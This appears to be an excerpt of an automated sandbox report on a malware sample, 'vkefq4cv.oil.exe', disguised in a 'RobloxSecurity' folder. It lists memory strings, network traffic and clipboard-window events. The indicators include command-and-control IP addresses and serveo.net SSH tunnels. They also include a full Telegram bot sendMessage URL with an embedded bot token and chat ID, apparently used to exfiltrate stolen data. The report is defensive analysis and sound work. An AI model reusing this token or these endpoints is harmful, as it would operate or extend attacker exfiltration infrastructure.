                  Source: powershell.exe, 00000001.00000002.1712328855.0000000005266000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC01B33000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D18E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                  Source: Amcache.hve.41.drString found in binary or memory: http://upx.sf.net
                  Source: powershell.exe, 00000001.00000002.1712328855.0000000005266000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: powershell.exe, 00000001.00000002.1717242084.0000000007819000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co(=
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD7480000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD78E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://13.231.21.109:443
                  Source: vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://164.90.185.9:443
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://18.178.28.151:443
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://185.217.98.121:443
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://192.99.196.191:443
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://44.228.161.50:443
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://64.227.21.98:443
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: powershell.exe, 00000001.00000002.1712328855.0000000005111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD854A000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.tele
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD854A000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8574000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85A8000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD854A000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85A8000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=51697
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: powershell.exe, 00000001.00000002.1715254235.000000000617A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000001.00000002.1715254235.000000000617A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000001.00000002.1715254235.000000000617A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://e2111f95f52ba8be6b2d3394e38b1722.se
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://e2111f95f52ba8be6b2d3394e38b1722.serveo.net
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmp, ssh.exe, 00000023.00000002.4114412277.0000019B79934000.00000004.00000020.00020000.00000000.sdmp, ssh.exe, 00000023.00000002.4114412277.0000019B798EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://e2111f95f52ba8be6b2d3394e38b1722.serveo.net/
                  Source: vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB9E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://e483612b93e055308d0c85f365c474ee.serveo.net
                  Source: ssh.exe, 00000021.00000002.4113726250.00000292607CC000.00000004.00000020.00020000.00000000.sdmp, ssh.exe, 00000021.00000002.4113726250.0000029260842000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://e483612b93e055308d0c85f365c474ee.serveo.net/
                  Source: powershell.exe, 00000001.00000002.1712328855.0000000005266000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD853B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/PowerShell/Win32-OpenSSH/releases/download/v9.2.2.0p1-Beta/OpenSSH-Win32.zip
                  Source: powershell.exe, 00000001.00000002.1715254235.000000000617A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7577000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE757F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7587000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7587000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7505000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE74E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7505000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE74E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7577000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE757F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7587000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7587000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7587000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7587000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7587000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown; HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe; Window created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
